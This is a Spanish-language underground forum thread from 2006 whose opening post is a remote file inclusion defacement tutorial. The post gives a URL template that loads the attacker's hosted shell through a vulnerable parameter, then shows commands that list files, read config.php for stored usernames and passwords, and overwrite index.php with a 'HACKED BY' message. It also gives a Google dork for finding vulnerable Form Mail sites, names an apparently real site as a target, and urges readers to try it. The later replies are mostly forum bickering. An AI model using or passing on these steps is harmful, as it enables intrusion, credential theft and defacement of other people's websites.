Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 18, 2008, 06:39:42
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Deface RFI By !z3r0 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Deface RFI By !z3r0  (Leído 1186 veces)
das
Visitante
« en: Marzo 30, 2006, 03:24:10 »
Un breve ejemplo ya que solo es para los que tengan permisos


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.Victima.com/index_vulnerable?vulnerabilidad=tu
shell?&cmd=comando a usar
 
Quieres modificar algo?

Te fijas si tienes permisos algunas shells te dicen esto:

write permission: YES es que tienes permisos de escritura

y claro si no tienes dice
write permission: NO tendras permisos y no podras hacer nada

xisten formas para tener los permisos solo me voy a lo breve grin

Si llegas a tener permisos haz esto:


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.Victima.com/index_vulnerable?vulnerabilidad=tu
shell?&cmd=Ls
                           
Te saldra esto :

admin/
admin.php
classes/
components/
config.php* <--------- aka esta el USER y el pass
data/
docs/
editor/
images/
includes/
index.php <-------------- Index.php
index2.php
installations/
kaotic.pl*
lang/
mainbody.php
modules/
pathway.php
root.htm
spy.php*
templates/
uploadfiles/
xD.htm
xx.htm*
zina

si te sale el config.php has esto :


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.Victima.com/index_vulnerable?vulnerabilidad=tu
shell?&cmd=cat config.php

y te saldra los usuarios y pass

y si nada mas kieres Defacear el index  haz esto :


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.victima.com/index_vulnerable?vulnerabilidad=tu
shell?&cmd=echo HACKED BY Tu NICK>index.php

Buscar victimas

Este es quisas el paso mas largo y tedioso ya que cada vez son menos las paginas vulnerables a este ataque (aunque siempre hay otras vulnerablidades que se pueden explotar  angel

Para empezar ponemos en google:

"allintext:powered by form mail 2.2" (sin comillas) y le damos a buscar.

Nos aparecen muchas webs para probar, generalmente las primeras paginas que aparcen no son vulnerables pero nunca esta de mas probar.

Por ejemplo a mi me salio en primer lugar en el google esta pagina:


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.mujerxmujer.com/formulario/fs2.2/index.php


Ahora a probar ustedes
En línea
DADE
Admin www.slotinformaticos.com
Colaborador
*****
Desconectado Desconectado

Mensajes: 832


Nada tarda tanto como aquello que no se empieza

dade_override@hotmail.com
Ver Perfil WWW
« Respuesta #1 en: Marzo 30, 2006, 03:32:29 »
En línea

das
Visitante
« Respuesta #2 en: Marzo 30, 2006, 03:48:54 »
Una shell, si no has entendido con escritos tecnicos es una "ventana" a otro sistema, sistema operativo, electronico digital, en red etc etc.


mira, esto por ejemplo es una shell y se adapta a la definicion. Es un bash shell de linux llamado cygwin en otras palabras este programa "abre" un shell en windows de linux.


aca te dejo un screen shot y si necesitas mas explicacion me dices.
En línea
DADE
Admin www.slotinformaticos.com
Colaborador
*****
Desconectado Desconectado

Mensajes: 832


Nada tarda tanto como aquello que no se empieza

dade_override@hotmail.com
Ver Perfil WWW
« Respuesta #3 en: Marzo 30, 2006, 03:50:56 »
En línea

das
Visitante
« Respuesta #4 en: Marzo 30, 2006, 03:53:11 »

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
En línea
DADE
Admin www.slotinformaticos.com
Colaborador
*****
Desconectado Desconectado

Mensajes: 832


Nada tarda tanto como aquello que no se empieza

dade_override@hotmail.com
Ver Perfil WWW
« Respuesta #5 en: Marzo 30, 2006, 03:54:34 »
Muy bien das, buen recurso, igual tienes tiempo de leerte algo de eso para contarme en lugar de darme links antes de que me vaya a dormir  Grin

Un saludo
En línea

DADE
Admin www.slotinformaticos.com
Colaborador
*****
Desconectado Desconectado

Mensajes: 832


Nada tarda tanto como aquello que no se empieza

dade_override@hotmail.com
Ver Perfil WWW
« Respuesta #6 en: Marzo 31, 2006, 07:31:51 »
Si, ahora que ya se lo que es una shell de defacing me gustaria saber que es una shell del sistema Wink

Un saludo
En línea

emanuelp92
Visitante
« Respuesta #7 en: Marzo 31, 2006, 07:50:33 »
ya ha hablado daS!! Angry       Shell de sistema = Shell de defacing!    juas juas juas Grin
« Última modificación: Marzo 31, 2006, 08:21:56 por emanuelp92 » En línea
[QuetZaL]
Colaborador
*****
Desconectado Desconectado

Mensajes: 401



Ver Perfil Email
« Respuesta #8 en: Marzo 31, 2006, 08:00:14 »
« Última modificación: Marzo 31, 2006, 08:02:29 por Sub7 Dark » En línea
emanuelp92
Visitante
« Respuesta #9 en: Marzo 31, 2006, 08:20:05 »
En línea
ManCuerTex
Visitante
« Respuesta #10 en: Marzo 31, 2006, 08:32:53 »
En línea
DADE
Admin www.slotinformaticos.com
Colaborador
*****
Desconectado Desconectado

Mensajes: 832


Nada tarda tanto como aquello que no se empieza

dade_override@hotmail.com
Ver Perfil WWW
« Respuesta #11 en: Marzo 31, 2006, 11:16:20 »
Esta bien Viper yo solo le pregunto lo que pasa que si no sabe contestarme...

Es mejor cerrar la boca y parecer gilipoyas que abrirla y demostrar que lo eres Wink

Un saludo
En línea

liquik
Visitante
« Respuesta #12 en: Marzo 31, 2006, 11:57:51 »
Joder pues a mi me da pena el chaval.....

vamos a dejarle un tiempo en paz vale??

Todos nos equivocamos pero no le hagamos una humillacion eso no es bueno

No nos sobremos porfavor

salu2
En línea
DADE
Admin www.slotinformaticos.com
Colaborador
*****
Desconectado Desconectado

Mensajes: 832


Nada tarda tanto como aquello que no se empieza

dade_override@hotmail.com
Ver Perfil WWW
« Respuesta #13 en: Marzo 31, 2006, 12:39:55 »
Es que este tipo trae cola, ya conozco 3 foros en los q ha borrado su cuenta y en uno de ellos la lio muy gorda, y si no miren esto:


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

Un saludo
En línea

terreviento
Habitual
*****
Desconectado Desconectado

Mensajes: 380


282 terreviento@gmail.com
Ver Perfil Email
« Respuesta #14 en: Marzo 31, 2006, 01:08:22 »
bueno das cuando pondras tus propios manuales no te entiendo tio?? xk te metes de moderar de algo ke no sabes???   Huh Huh seria bueno cuidar un poco tu imagen tio ya vez lo ke pasa te haces humillar!! y ojala ke no borres este post!!! (borar post es algo ke das sabe muy bien)
salu2
PD: a ber si haces un tuto de como borar post eso es lo ke puedes
salu2 Smiley
En línea
emanuelp92
Visitante
« Respuesta #15 en: Marzo 31, 2006, 05:15:19 »
En línea
DADE
Admin www.slotinformaticos.com
Colaborador
*****
Desconectado Desconectado

Mensajes: 832


Nada tarda tanto como aquello que no se empieza

dade_override@hotmail.com
Ver Perfil WWW
« Respuesta #16 en: Abril 01, 2006, 03:15:44 »
En línea

arvin
Visitante
« Respuesta #17 en: Abril 02, 2006, 02:43:12 »
Cita de: das en Marzo 30, 2006, 03:48:54
Una shell, si no has entendido con escritos tecnicos es una "ventana" a otro sistema, sistema operativo, electronico digital, en red etc etc.


mira, esto por ejemplo es una shell y se adapta a la definicion. Es un bash shell de linux llamado cygwin en otras palabras este programa "abre" un shell en windows de linux.


aca te dejo un screen shot y si necesitas mas explicacion me dices.



HEY!! Este Post es mio!!
En línea
the_trooper_eddie
Miembro
*****
Desconectado Desconectado

Mensajes: 31


Ver Perfil
« Respuesta #18 en: Junio 03, 2006, 05:14:54 »
la mayoria de webs q pillo , me salen que no hay acceso autorizado...
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Deface RFI By !z3r0 « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC